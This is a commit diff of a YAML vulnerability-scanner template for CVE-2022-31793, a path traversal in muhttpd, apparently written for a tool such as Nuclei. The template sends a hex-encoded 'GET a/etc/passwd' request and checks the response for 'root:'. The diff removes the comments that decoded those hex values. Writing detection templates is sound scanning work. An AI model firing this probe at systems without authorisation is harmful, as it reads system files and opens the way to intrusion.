parent
c56784a036
commit
ba2f15e9e8
|
@ -3,24 +3,24 @@ id: CVE-2022-31793
|
||||||
info:
|
info:
|
||||||
name: muhttpd <= 1.1.5 - Path traversal
|
name: muhttpd <= 1.1.5 - Path traversal
|
||||||
author: scent2d
|
author: scent2d
|
||||||
severity:
|
severity: unknown
|
||||||
description: |
|
description: |
|
||||||
A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
|
A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
|
||||||
reference:
|
reference:
|
||||||
- https://derekabdine.com/blog/2022-arris-advisory.html
|
- https://derekabdine.com/blog/2022-arris-advisory.html
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics:
|
cvss-metrics: unknown
|
||||||
cvss-score:
|
cvss-score: 0.0
|
||||||
cve-id: CVE-2022-31793
|
cve-id: CVE-2022-31793
|
||||||
cwe-id:
|
cwe-id: unknown
|
||||||
tags: cve,cve2022,muhttpd,lfi,unauthenticated
|
tags: cve,cve2022,muhttpd,lfi,unauthenticated
|
||||||
|
|
||||||
network:
|
network:
|
||||||
- host:
|
- host:
|
||||||
- "{{Hostname}}"
|
- "{{Hostname}}"
|
||||||
inputs:
|
inputs:
|
||||||
- data: "47455420612F6574632F706173737764" # GET a/etc/passwd
|
- data: "47455420612F6574632F706173737764"
|
||||||
type: hex
|
type: hex
|
||||||
- data: "\n\n"
|
- data: "\n\n"
|
||||||
|
|
||||||
|
@ -29,5 +29,5 @@ network:
|
||||||
- type: word
|
- type: word
|
||||||
encoding: hex
|
encoding: hex
|
||||||
words:
|
words:
|
||||||
- "726f6f743a" # root:
|
- "726f6f743a"
|
||||||
part: body
|
part: body
|
Loading…
Reference in New Issue